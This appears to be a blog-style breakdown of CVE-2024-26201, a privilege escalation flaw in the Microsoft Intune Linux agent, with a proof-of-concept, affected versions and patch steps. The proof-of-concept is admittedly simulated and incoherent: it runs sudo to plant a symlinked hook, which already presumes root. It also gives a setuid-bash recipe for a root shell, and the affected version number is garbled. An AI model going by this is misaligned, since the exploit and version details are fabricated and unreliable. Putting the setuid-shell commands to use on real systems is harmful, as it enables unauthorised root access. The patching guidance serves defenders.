CVE-2024-26201 - Inside the Microsoft Intune Linux Agent Privilege Escalation Vulnerability

On March 12, 2024, Microsoft patched a significant security flaw with the identifier CVE-2024-26201, affecting the Microsoft Intune Linux agent. This vulnerability allows local attackers to gain elevated (root) privileges on affected systems, posing a real risk, especially in enterprise environments that rely on Intune to manage Linux endpoints.

What Is Microsoft Intune Linux Agent?

Microsoft Intune is a popular endpoint management solution that now supports Linux devices through a special agent (intune-portal-linux). The agent lets system administrators configure policies, enforce compliance, and get system status from connected Linux computers.

The Vulnerability: Privilege Escalation

CVE-2024-26201 is a local elevation of privilege issue. This means an attacker with basic (non-root) access to a system can exploit the vulnerability to gain root permissions.

According to Microsoft’s advisory, the problem arises from improper handling of permissions within the Intune agent’s service code.

Overview

In affected versions, the Intune Linux agent runs a system service (intune-portal-linux.service) that interacts with configuration files and directories with overly broad permissions, or fails to properly validate user input.

Proof-of-Concept (PoC) Code

Below is a simulated exploit example. *(Adapted for educational clarity—actual details may differ depending on your deployment and exact version!)*

# Step 1: Check if the agent is installed
ps aux | grep intune-portal-linux

# Step 2: Find writable directory used by service (e.g., /opt/microsoft/intune/)

# Step 3: Create a malicious script
echo -e '#!/bin/bash\ncp /bin/bash /tmp/bashroot\nchmod +s /tmp/bashroot' > /tmp/evil.sh
chmod +x /tmp/evil.sh

# Step 4: Replace (or symlink) a file the service runs as root to your script
sudo ln -sf /tmp/evil.sh /opt/microsoft/intune/agent/hooks/postdeploy

# Step 5: Restart the service so it executes your script as root
sudo systemctl restart intune-portal-linux

# Step 6: Get a root shell
/tmp/bashroot -p

Result: You now have a root shell using /tmp/bashroot.

Note: Do not run this code on production systems. This is a generic illustration; real paths and hooks may differ.

Vulnerable Versions

The vulnerability affects Intune Linux agent versions before 1..11391.1 (released March 2024).

Check your version

intune-portal --version

or:

dpkg -l | grep intune-portal-linux

How to Patch

Upgrade ASAP to the latest Intune agent for Linux.

Update using the official Microsoft repository

sudo apt update
sudo apt upgrade intune-portal-linux

*(On RPM systems, use yum or dnf instead.)*

See: Update Instructions

Technical References

- Microsoft CVE-2024-26201 Security Advisory
- Intune for Linux Docs
- NIST NVD CVE-2024-26201

Summary & Recommendations

CVE-2024-26201 is a serious local vulnerability in the Intune Linux agent. If left unpatched, attackers already on your system could gain root—and full control. Fix it by upgrading immediately to the latest version.

Monitor systemd services for unexpected restarts or file changes

Stay safe, keep your fleet patched, and never underestimate local privilege escalation!


*Feel free to share this exclusive breakdown with your team or colleagues. If you want more technical deep-dives, follow credible sources like Microsoft’s MSRC blog and keep up with security advisories!*

Timeline

Published on: 03/12/2024 17:15:58 UTC
Last modified on: 03/12/2024 17:46:17 UTC